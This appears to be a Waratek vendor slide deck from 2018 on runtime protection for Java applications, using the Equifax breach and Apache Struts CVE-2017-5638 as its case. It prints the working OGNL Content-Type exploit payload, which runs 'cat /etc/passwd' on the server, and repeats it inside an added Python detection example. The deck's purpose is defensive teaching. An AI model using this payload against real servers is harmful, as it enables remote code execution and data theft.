Waratek Runtime Protection Platform


Waratek Runtime Protection Platform
Cirosec TrendTage - March 2018
Waratek Solves the Application Security Problems That No One Else Can
Prateep Bandharangshi, Director of Client Security Solutions

Timeline: March 2017 to September 2017
On 8 September 2017, Equifax announced a cybercrime identity theft event potentially impacting approximately 143 million U.S. consumers. Equifax said the breach was facilitated using a flaw in Apache Struts (CVE-2017-5638). A patch for the vulnerability was released on March 7, yet the company failed to apply the security update before the attack occurred two months later.

January, 2018 Senators want 'massive' fines for data breaches at Equifax and other credit reporting firms January 10, 2018

February, 2018 The Equifax breach may have exposed more personal information of customers than previously thought. February 10, 2018

March, 2018 Equifax breach could be most costly in corporate history Total costs of the breach could be well over $600 million March 02, 2018

GDPR Implications
If the breach had been a violation of GDPR, the highest tier fine (4% of annual global turnover) would translate to $125.8 million. https://www.schellman.com/blog/gdpr-equifax-breach-the-hypothetical

CVE-2017-5638 The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

The Content-Type entity header indicates the media type of the resource. In requests such as POST or PUT, the client tells the server what type of data is actually being sent. In the vulnerable Struts versions, the Jakarta multipart parser copied an unparseable Content-Type value into its error message, and that message was then evaluated as an OGNL expression, which is what the crafted header below exploits:

Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
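As an added example (not Waratek's code and not part of this deck), the following Python performs the kind of header check an edge proxy or a runtime hook could run on the headers the Jakarta parser reads: it flags OGNL expression markers in Content-Type, Content-Disposition and Content-Length, and separately flags a multipart Content-Type that is not well-formed. The marker list, the regex, the sample requests and the placeholder host target.example are constructed for the example. Note that the payload above deliberately embeds the literal 'multipart/form-data' so that Struts routes the request to the multipart parser, so a check that only looks for that substring would let it through.

```python
"""Header check for CVE-2017-5638-style OGNL injection (added example).

Not Waratek's code; the marker list, the regex and the sample requests
are constructed for this example.
"""
import re

# Markers taken from the public exploit payload shown above: the OGNL
# expression delimiters plus the reflective calls used to disable the
# member-access sandbox and spawn a process.
OGNL_MARKERS = (
    "%{",
    "${",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "#_memberAccess",
    "com.opensymphony.xwork2",
    "#cmd=",
    "java.lang.ProcessBuilder",
)

# Request headers the Jakarta multipart parser copies into its error text.
INSPECTED_HEADERS = ("content-type", "content-disposition", "content-length")

# A well-formed multipart Content-Type: the media type followed by
# ;name=value parameters (quoted string or token), nothing else.
MULTIPART_RE = re.compile(
    r'^multipart/form-data\s*(;\s*[A-Za-z0-9_.-]+=("[^"]*"|[^;\s]+)\s*)*$',
    re.IGNORECASE,
)


def parse_headers(raw):
    """Split a raw HTTP/1.1 request head into (request_line, {lower_name: value})."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if line == "":          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw):
    """Return [(header, reason), ...]; an empty list means nothing suspicious."""
    _, headers = parse_headers(raw)
    findings = []
    for name in INSPECTED_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        hits = [m for m in OGNL_MARKERS if m.lower() in value.lower()]
        if hits:
            findings.append((name, "OGNL markers: " + ", ".join(hits)))
        elif name == "content-type" and value.lower().startswith("multipart/") \
                and not MULTIPART_RE.match(value):
            findings.append((name, "malformed multipart Content-Type"))
    return findings


def decide(raw):
    """'block' if any inspected header is suspicious, else 'allow'."""
    return "block" if inspect_request(raw) else "allow"


# Constructed sample requests (target.example is a placeholder host).
EXPLOIT_REQUEST = (
    "POST /struts2-showcase/upload.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: %{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):"
    "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))."
    "(#cmd='cat /etc/passwd')."
    "(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.start())}\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "POST /struts2-showcase/upload.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxkTrZu0gW\r\n"
    "Content-Length: 138\r\n"
    "\r\n"
)
MALFORMED_REQUEST = (
    "POST /struts2-showcase/upload.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: multipart/form-data; boundary=a b; junk\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST),
                       ("malformed", MALFORMED_REQUEST)):
        print(label, decide(req), inspect_request(req))
```

This only inspects request headers. The later S2-046 variant of the same flaw carries the expression in the filename of a part's Content-Disposition inside the multipart body, so a check at this layer must also parse the body, or be backed by a control at the point where the parser builds its error message.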

DEMO

Better coding will cure application attacks.

More Secure Application Coding Cannot Solve the Problem!
We can't rely only on developers to write secure code.
Even if they do write perfect, secure code, your developers are responsible for less than 20% of the code you actually run.
Large enterprises can identify far more vulnerabilities than they can actually fix.
Patching and updating everything is often completely unrealistic.

Waratek Application Security Platform

Waratek
Waratek is a plugin (agent) to the JVM or the .NET CLR. We solve three key problems:
1. Instantly patch Java and .NET applications
2. Secure against the OWASP Top Ten / SANS 25
3. Virtually upgrade out-of-support Java applications
Out of the box protection against remote code injection exploits like the Apache Struts one above.

Waratek Containers
A container inside the Java Virtual Machine, architecturally similar to Docker.
In the Docker world, you have: a host operating system and a guest Docker container.
In the Waratek world, you have: a host Java Virtual Machine and a guest Java container.

What can I use Docker for?
Fast, consistent delivery of your applications
Responsive deployment and scaling
Running more workloads on the same hardware
Docker is great for operations and deployment. It was not designed to solve application security problems.

Waratek Java Container Inside the JVM

Waratek Containers
Waratek's Runtime Container is a quarantined in-JVM container with extensive application security controls.
A Runtime Container virtualizes the entire application stack (including the application's own JRE) from the host JVM/CLR and OS.
A Runtime Container's security controls are invisible, extensible, and omnipresent.
[Diagram: a fully protected, containerized application (Business Logic, 3rd Party Components, Platform & Java APIs, JRE 4-8) running as a guest inside a Waratek Java 8/9 host JVM]

As Waratek is inside the application...
We see every file system operation
We see every network connection
We see every call to a Java API
We see every execution of an operating system command
We see every connection to a database
We see every SQL statement
We see every memory read and write operation
We see every CPU instruction
etc., etc., etc.
Most importantly, this visibility is complete and deterministic, resulting in no false positives.

Application Security Policy
SQLi, XSS, CSRF, unsafe deserialisation
File system operations (read/write/exec)
Network I/O
Use of Java APIs
Zero-day protection / hardening
Virtual patching

demo@demo1:~$ curl -s https://download.waratek.com/waratek-agent.tar.gz | tar zxf -
demo@demo1:~$ export JAVA_HOME="/opt/oracle/jdk-hs-8u162-linux-x64"
demo@demo1:~$ export CATALINA_OPTS=" \
    -agentpath:${HOME}/waratek/libwaratek.so \
    -javaagent:${HOME}/waratek/waratek.jar \
    -Dcom.waratek.ContainerHome=/opt/oracle/jdk-hs-7u80-linux-x64 \
    -Dcom.waratek.rules.local=${HOME}/jvc.rules \
    -Dcom.waratek.log.properties=${HOME}/logProps.xml \
    -Dcom.waratek.rules.autoreload=true"
demo@demo1:~$ ./tomcat_startup.sh

Identical deployment model to Application Performance Monitoring (APM) agents such as AppDynamics and New Relic: a native agent (-agentpath) plus a Java agent (-javaagent) passed to the JVM at startup. Note that the host JVM version (JAVA_HOME, 8u162) differs from the one used by the guest Java Container (ContainerHome, 7u80). For a production deployment, download the agent archive to disk and verify its checksum before unpacking rather than piping curl straight into tar.

DEMO

Attack Detection/Response/Zero Day
Runtime Protection Rules
Unbounded rules replace or insert functionality at runtime to provide patch-equivalent remediation.
Rules make it possible to virtually patch any vulnerability in Java Critical Patch Updates (CPUs), application servers (WebLogic, JBoss, Tomcat, etc.) and frameworks.
Virtual patching applies instantly at runtime with immediate effect, without restarting the target application.
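As an added example (not Waratek's engine or its rule language, and not code from this deck), the following Python mirrors what the CVE-2016-3092 rule on the next slide does: a constructor modelled on commons-fileupload's MultipartStream, keeping its "too small" guard, and a write-interception hook that rewrites every assignment to buf_size to at least twice the boundary length, installed and removed while the code keeps running. The class, the field names, the guard condition and the sample boundary are constructed for the example; only the rule body, max(bufSize, boundaryLength*2), comes from the slide.

```python
"""Runtime ('virtual') patch for the CVE-2016-3092 buffer clamp (added example).

Not Waratek's code or rule language: a Python stand-in that intercepts the
write of buf_size the way the slide's 'AT WRITE bufSize' rule does.
"""
import logging

log = logging.getLogger("virtual-patch")

BOUNDARY_PREFIX = b"\r\n--"   # prefix commons-fileupload prepends to the boundary


class MultipartStream:
    """Constructor modelled on the unpatched MultipartStream (assumed shape):
    the 'too small' guard exists, but nothing stops a buffer that is larger
    than boundary_length + 1 yet smaller than twice the boundary."""

    def __init__(self, input_stream, boundary, buf_size):
        self.boundary_length = len(boundary) + len(BOUNDARY_PREFIX)
        if buf_size < self.boundary_length + 1:
            raise ValueError("The buffer size specified for the MultipartStream is too small")
        self.input = input_stream
        self.buf_size = buf_size                 # <- the write the rule intercepts
        self.buffer = bytearray(self.buf_size)
        self.boundary = BOUNDARY_PREFIX + boundary


def install_write_rule(cls, field, transform, rule_name):
    """Rewrite every assignment to `field` on instances of `cls` through
    transform(instance, value), logging when the value changes. Returns a
    function that removes the rule again: install and uninstall happen
    without restarting anything."""
    original_setattr = cls.__setattr__

    def guarded_setattr(self, name, value):
        if name == field:
            new_value = transform(self, value)
            if new_value != value:
                log.warning("applying %s: %s %r -> %r", rule_name, field, value, new_value)
            value = new_value
        original_setattr(self, name, value)

    cls.__setattr__ = guarded_setattr

    def uninstall():
        cls.__setattr__ = original_setattr

    return uninstall


def cve_2016_3092_rule(stream, requested):
    """The slide's rule body: $bufSize = Math.max($bufSize, $boundaryLength * 2).
    boundary_length has already been written by the time buf_size is assigned."""
    return max(requested, stream.boundary_length * 2)


def buffer_size_for(boundary, requested, patched):
    """Allocate a stream and return the buffer size it actually got, with the
    virtual patch installed for the duration of the call when patched=True."""
    uninstall = None
    if patched:
        uninstall = install_write_rule(MultipartStream, "buf_size",
                                       cve_2016_3092_rule,
                                       "Virtual Patch for CVE-2016-3092")
    try:
        return len(MultipartStream(b"", boundary, requested).buffer)
    finally:
        if uninstall is not None:
            uninstall()


def guard_rejects(boundary, requested, patched):
    """True when the constructor's own 'too small' check still fires."""
    try:
        buffer_size_for(boundary, requested, patched)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    long_boundary = b"-" * 60             # constructed: boundary_length becomes 64
    print("unpatched:", buffer_size_for(long_boundary, 100, False))   # 100
    print("patched:  ", buffer_size_for(long_boundary, 100, True))    # 128
    print("guard:    ", guard_rejects(long_boundary, 10, True))       # True
```

Because the hook fires at the write of buf_size, which happens after the guard, the constructor still rejects the sizes it rejected before and only the accepted-but-undersized ones are enlarged; that is the same ordering as the source fix, where the Math.max line sits below the IllegalArgumentException check.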

Attack Detection/Response/Zero Day
--- commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/multipartstream.java +++ commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/multipartstream.java @@ -338,6 +332,12 @@ throw new IllegalArgumentException( "The buffer size specified for the MultipartStream is too small"); } this.input = input; + this.bufsize = Math.max(bufSize, boundarylength*2); this.buffer = new byte[this.bufsize]; this.notifier = pnotifier; Source code fix this.boundary = new byte[this.boundarylength]; this.keepregion = this.boundary.length;

Virtual Patch:
RULE Virtual Patch for CVE-2016-3092
CLASS org/apache/tomcat/util/http/fileupload/MultipartStream
METHOD <init>(java/io/InputStream,byte[],int,MultipartStream$ProgressNotifier)
AT WRITE bufSize
IF true
DO warn("applying Virtual Patch for CVE-2016-3092");
   $bufSize = java/lang/Math.max($bufSize, $boundaryLength*2);
ENDRULE
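Review bot: the added line `+ this.bufsize = Math.max(bufSize, boundarylength*2);` carries no comment explaining why twice the boundary length is the floor, and the hunk header `@@ -338,6 +332,12 @@` promises six added lines of which only this one is visible, so the slide does not show what else the fix changed. Because the clamp sits below the existing `throw new IllegalArgumentException("The buffer size specified for the MultipartStream is too small")`, that guard still rejects exactly what it rejected before, while a caller passing a size the guard accepts but that is below 2*boundaryLength now silently gets a larger buffer; suggest a one-line comment naming CVE-2016-3092 on the `+` line (the runtime rule's warn() call carries that context, the source fix does not) and a note in the constructor's documentation that bufSize is a minimum, not an exact allocation. Note also that the caption "Source code fix" has been spliced into the hunk between `this.notifier = pnotifier;` and `this.boundary = new byte[this.boundarylength];` and is not part of the patch.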

Questions?